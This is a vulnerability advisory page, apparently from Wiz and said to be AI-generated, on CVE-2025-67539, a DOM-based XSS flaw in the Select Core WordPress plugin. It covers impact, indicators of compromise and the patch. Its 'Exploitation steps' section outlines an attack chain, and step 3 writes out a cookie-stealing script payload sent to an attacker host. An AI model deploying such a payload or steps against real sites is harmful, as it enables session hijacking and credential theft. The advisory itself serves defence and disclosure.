CVE-2025-67539
WordPress vulnerability analysis and mitigation

Overview

CVE-2025-67539 is a DOM-Based Cross-Site Scripting (XSS) vulnerability in the Select Core WordPress plugin developed by Select-Themes. It affects all versions of the plugin prior to 2.6, allowing authenticated attackers with at least Contributor-level privileges to inject malicious scripts into web pages. The vulnerability was reported by researcher João Pedro S Alcântara (Kinorth) on October 15, 2025, published by Patchstack on November 14, 2025, and assigned a CVE on December 9, 2025. It carries a CVSS v3.1 base score of 6.5 (Medium) (Patchstack).

Technical details

The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-Site Scripting), specifically manifesting as DOM-Based XSS. In DOM-Based XSS, the attack payload is injected and executed entirely within the browser's Document Object Model without requiring a server-side reflection, meaning the malicious script is processed by client-side JavaScript that unsafely handles attacker-controlled input. Exploitation requires the attacker to hold at least Contributor or Developer-level privileges on the WordPress site, and successful execution also requires a privileged user to interact with the crafted content (e.g., visiting a malicious page or clicking a link). No public proof-of-concept code has been disclosed (Patchstack).

Impact

Successful exploitation allows an attacker to inject and execute arbitrary JavaScript in the context of a victim's browser session on the affected WordPress site. This can lead to session hijacking, credential theft, unauthorized actions performed on behalf of the victim, defacement via injected redirects or advertisements, and delivery of further malicious payloads to site visitors. The scope is marked as Changed in the CVSS scoring, indicating that the impact can extend beyond the vulnerable component to affect other users or systems interacting with the site (Patchstack).

Exploitability

No public proof-of-concept exploit code or evidence of active in-the-wild exploitation has been reported for CVE-2025-67539. The EPSS score is approximately 0.039%, indicating a very low probability of exploitation in the near term. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Patchstack notes that XSS vulnerabilities of this type are sometimes used in mass-exploit campaigns targeting WordPress plugins at scale, regardless of individual site popularity (Patchstack).

Exploitation steps

  1. Reconnaissance: Identify WordPress sites running the Select Core plugin (by Select-Themes) at versions below 2.6, using tools like WPScan or by inspecting plugin metadata in publicly accessible WordPress installations.
  2. Obtain required access: Acquire at least Contributor-level credentials on the target WordPress site, either through credential stuffing, phishing, or registration if open.
  3. Craft malicious payload: Prepare a DOM-Based XSS payload (e.g., <script>document.location='https://attacker.com/steal?c='+document.cookie</script>) designed to be processed by the plugin's client-side JavaScript.
  4. Inject payload: Insert the malicious payload into a plugin-rendered input field or parameter that is unsafely handled by the Select Core plugin's DOM manipulation logic.
  5. Trigger victim interaction: Deliver a link or page to a privileged user (e.g., Administrator) that causes their browser to load and execute the injected script, achieving session hijacking or other objectives (Patchstack).

Indicators of compromise

  • Logs: WordPress access logs showing unusual POST or GET requests to pages rendered by the Select Core plugin containing encoded JavaScript payloads (e.g., <script>, javascript:, onerror=, onload= patterns in URL parameters or form fields.
  • Network: Outbound browser requests from victim sessions to unexpected external domains shortly after interacting with Select Core plugin content, potentially indicating cookie or credential exfiltration.
  • File System: Unexpected modifications to plugin files within the wp-content/plugins/select-core/ directory that may indicate secondary compromise following XSS exploitation.
  • Process/Behavior: Unusual administrator account activity (e.g., new admin user creation, plugin installations, settings changes) following a privileged user's interaction with Select Core plugin pages.

Mitigation and workarounds

The vendor has released version 2.6 of the Select Core plugin, which patches this vulnerability. WordPress site administrators should update the Select Core plugin to version 2.6 or later immediately via the WordPress admin dashboard or by downloading the updated plugin from the official source. Patchstack users can enable auto-update for vulnerable plugins to automate remediation. If an immediate update is not possible, restricting Contributor and Developer role access and monitoring for suspicious content submissions are recommended interim measures (Patchstack).

Additional resources


SourceThis report was generated using AI

Related WordPress vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-77115HIGH7.1
  • brave-popup-builder
NoYesAug 23, 2026
CVE-2026-77116MEDIUM4.3
  • brave-popup-builder
NoYesAug 23, 2026
CVE-2026-14853MEDIUM4.3
  • woocommerce-bookings
NoYesAug 23, 2026
CVE-2026-77003LOW2.7
  • content-mask
NoYesAug 23, 2026
CVE-2026-13598NONEN/A
  • restrictmate
NoYesAug 23, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management